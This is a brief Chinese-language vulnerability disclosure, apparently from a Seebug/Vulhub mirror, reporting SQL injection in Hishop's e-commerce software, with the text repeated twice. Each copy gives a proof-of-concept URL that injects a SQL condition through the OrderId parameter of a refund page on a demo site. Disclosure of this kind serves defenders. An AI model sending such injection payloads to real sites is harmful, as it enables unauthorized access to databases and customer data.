VULHUB ™

### 简要描述： hishop最新版存在SQL注入（demo演示） ### 详细说明： hishop最新版存在SQL注入（demo演示） http://www.hishop.com.cn/products/ydfx/ [<img src="https://images.seebug.org/upload/201512/251908128f3b569987249868b7d81fd8de4dd084.jpg" alt="1.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/251908128f3b569987249868b7d81fd8de4dd084.jpg) 这里是demo： 随意注册一个，登录，访问POC： ``` http://ydfx.demo.shopefx.com/user/UserRefundApply.aspx?OrderId=%27%20and%20(select%20@@version)%3E0%20and%20%271%27=%271 ``` ### 漏洞证明： ``` http://ydfx.demo.shopefx.com/user/UserRefundApply.aspx?OrderId=%27%20and%20(select%20@@version)%3E0%20and%20%271%27=%271 ``` [<img src="https://images.seebug.org/upload/201512/25190902dff776ed8989665b72956360bdd5bef8.jpg" alt="2.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/25190902dff776ed8989665b72956360bdd5bef8.jpg)

### 简要描述： hishop最新版存在SQL注入（demo演示） ### 详细说明： hishop最新版存在SQL注入（demo演示） http://www.hishop.com.cn/products/ydfx/ [<img src="https://images.seebug.org/upload/201512/251908128f3b569987249868b7d81fd8de4dd084.jpg" alt="1.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/251908128f3b569987249868b7d81fd8de4dd084.jpg) 这里是demo： 随意注册一个，登录，访问POC： ``` http://ydfx.demo.shopefx.com/user/UserRefundApply.aspx?OrderId=%27%20and%20(select%20@@version)%3E0%20and%20%271%27=%271 ``` ### 漏洞证明： ``` http://ydfx.demo.shopefx.com/user/UserRefundApply.aspx?OrderId=%27%20and%20(select%20@@version)%3E0%20and%20%271%27=%271 ``` [<img src="https://images.seebug.org/upload/201512/25190902dff776ed8989665b72956360bdd5bef8.jpg" alt="2.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/25190902dff776ed8989665b72956360bdd5bef8.jpg)